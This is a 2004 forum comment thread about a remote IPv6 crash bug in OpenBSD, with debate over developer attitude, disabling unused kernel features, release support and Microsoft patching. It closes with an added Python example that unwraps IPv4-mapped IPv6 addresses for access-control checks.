I know that Theo allegedly has an attitude problem, however those who extrapolate from his remark that it is only a crash to suggest that he does not care are IMHO quite wrong. I think he was only putting the event in its true perspective, as being of slightly less importance than a security breach. I think he does care, very much, that "his" software works properly, that is what drives such people, who could earn much more financial reward elsewhere.
All of this is a matter of seeing the thing in its true perspective. If people did that, no-one at all would use the products of the Convicted Monopolist, and the world would be a very much safer place as regards computer security, and much more productive because there would probably be only one crash for 1000 or even 1000000 BSODs in inferior systems, which are riddled with fundamental design errors.
If they want a system with users, it helps to not turn them away by being rude and dismissive.
Users are good for lots of goals, because users find, report, and sometimes fix bugs.
If they want cooperation from other OS/app writers, it helps to be less competitive. I know these aren't *directly* on the list, but surely they contribute indirectly to the goals.
Just as you defend Theo's right to say things like that, should I not also have the right to call him on his attitude?
Is there any way that we could prod Santana to bring his binary patches up to date for 3.3 i386 when the patch is released?
I've already emailed him that I'd send him $50.
...the documentation advises against building your own kernel unless you have a very good reason. They won't support you, either (not that their support will solve all your problems).
C'mon, how many people are running IPv6? I'm sure both of them have upgraded to -current already.
At least mafia-owned pizzarias make excellent pizza. Compare to Bill Gates.
http://bsd.slashdot.org/article.pl?sid=04/02/05/2056234
Remotely Crash OpenBSD
Posted by CowboyNeal on Thu Feb 05, '04 22:49
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet6/ip6_output.c
CVS log for src/sys/netinet6/ip6_output.c
Revision 1.82 / (download) - annotate - [select for diffs] , Wed Feb 4 08:47:41 2004
Get it?
Haida Manga
Forgetting corporate inertia for a moment, you have the choice of hurried, not thoroughly tested, patches; or waiting weeks while they test it thoroughly.
Think of the sheer number of test cases. You've got how many different versions of Windows still supported. Multiply that by all the apps MSFT sells (e.g.: Office) and all the apps that major corporations also run (e.g. Oracle). Multiply by a few hundred hardware platforms.
I'm not particularly fond of MSFT myself, but complaining about the speed AND quality of their patches reflects poorly on you.
I think, therefore I am.
Now, if you'll excuse me, I have backups to corrupt.
Doesn't that violate the first rule of security: restrict physical access? If anyone can walk in and access the firewalls/routers, they could do whatever they want to them, OpenBSD or not.
"Those who consume the bulk of goods are those who make them. We must never forget this secret of our prosperity."
I see. Interesting. :)
"Those who consume the bulk of goods are those who make them. We must never forget this secret of our prosperity."
There is a difference between:
"He should do X" and
"I think he should do X to achieve Y".
Especially when Y isn't on the goals.html page.
Yes, more users would seem logical, but it's not one of the goals. Reread it and you'll see.
-- I'm as unique as everyone else.
Every added feature adds risk for bugs.
// hdw
If I don't use a feature I turn it off.
In this case I know that I'm not using IPv6, but there might very well be IPv6 traffic around my firewalls.
Even if no one can connect over IPv6, it doesn't mean that IPv6 packets will not be processed by my kernel.
Can you really say that disabling IPv6 support in the kernel does not affect security?
The code standard in OpenBSD is very high, but it's not bug free. And a bug in disabled code is a bug that can't bite me.
And I don't 'gank' anything out, I use the configuration file exactly as it's supposed to be used.
Every time there's a new release I reinstall my build server, then I go over rc.conf, sysctl.conf and kernel conf adding the options I need, removing the stuff I don't need and build my internal release.
Executive Pope (small) Kallisti Engineering
"And a bug in disabled code is a bug that can't bite me." How about the bugs you might create by removing or disabling stuff without careful consideration?
Uh?
// hdw
The bug I create by switching an option in a config file from on to off?
The point of having options in the config file is that you're supposed to config the kernel to your needs.
Switching unused options off is careful consideration.
Executive Pope (small) Kallisti Engineering
See Daniel Hartmeier's answer.
Basically OpenBSD releases are supported one year (2 releases), i.e. you only have to upgrade every other release. In fact a release is supported for 13 months to give users a 1 month window to upgrade.
At the time of the telnetd exploit (July 2001) the oldest supported release was 2.7 or 2.8 and telnetd had been disabled from the default install between 2.5 and 2.6. So if you used a supported release you were safe. Since upgrades are free and take about one hour there's no reason not to do it once a year...
Um, maybe you haven't seen that Microsoft has been making IE and Outlook Express for Mac since version 3 of Internet Explorer and Outlook Express 4.5. IE is also included in MacOS X installs.
I used to be indecisive, but now I'm not so sure.
But the Mac port of IE is a different codebase.
Here is an MSDN article from 1998 that tells how MS did it.
http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarwbgen/html/msdn_unixwin32.asp
They used MainSoft's Win32 layer for Unix.
-- Jason
The ipv6 loopback address is ::1. The v6-mapped version of the ipv4 loopback address is ::ffff:127.0.0.1. Why do I get the feeling that most people aren't really thinking ipv6 here?
#define X(x,y) x##y
Peter Cordes ; e-mail: X(peter@cordes ,
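The v6-mapped point above is what trips up access lists that only think in IPv4, and it is also why the earlier firewall comment about IPv6 packets still reaching the kernel matters. Here is an added example (not from any poster on this thread) in Python with the standard ipaddress module, unwrapping ::ffff:a.b.c.d before classifying or matching a peer address; the sample addresses and trusted networks are constructed.

```python
import ipaddress
from typing import Iterable, Union

Address = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def effective_address(text: str) -> Address:
    """Return the address an access-control decision should reason about.

    ::1 stays an IPv6 loopback address, but an IPv4-mapped address such as
    ::ffff:127.0.0.1 (also written ::ffff:7f00:1) is the embedded IPv4 address
    arriving over an IPv6 socket, so it is unwrapped first.
    """
    addr = ipaddress.ip_address(text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def is_loopback(text: str) -> bool:
    """Loopback in either family, including the v4-mapped form of 127.0.0.1."""
    return effective_address(text).is_loopback


def classify(text: str) -> str:
    """Coarse label for a peer address as a firewall log reviewer would want it."""
    addr = ipaddress.ip_address(text)
    # Check the mapped form first so the result does not depend on whether
    # this Python version's is_loopback already looks through the mapping.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return "v4-mapped-loopback" if addr.ipv4_mapped.is_loopback else "v4-mapped"
    if addr.is_loopback:
        return "loopback"
    if isinstance(addr, ipaddress.IPv6Address) and addr.is_link_local:
        return "link-local"
    return "other"


def allowed_by(text: str, trusted: Iterable[str]) -> bool:
    """True if the peer falls inside one of the trusted networks (either family).

    Unwrapping is what lets ::ffff:10.0.0.5 match a 10.0.0.0/8 entry; the raw
    IPv6 address compared against an IPv4 network never matches. A bare ::1
    still does not match 127.0.0.0/8, because that is a different family.
    """
    peer = effective_address(text)
    for net in trusted:
        network = ipaddress.ip_network(net, strict=False)
        if peer.version == network.version and peer in network:
            return True
    return False
```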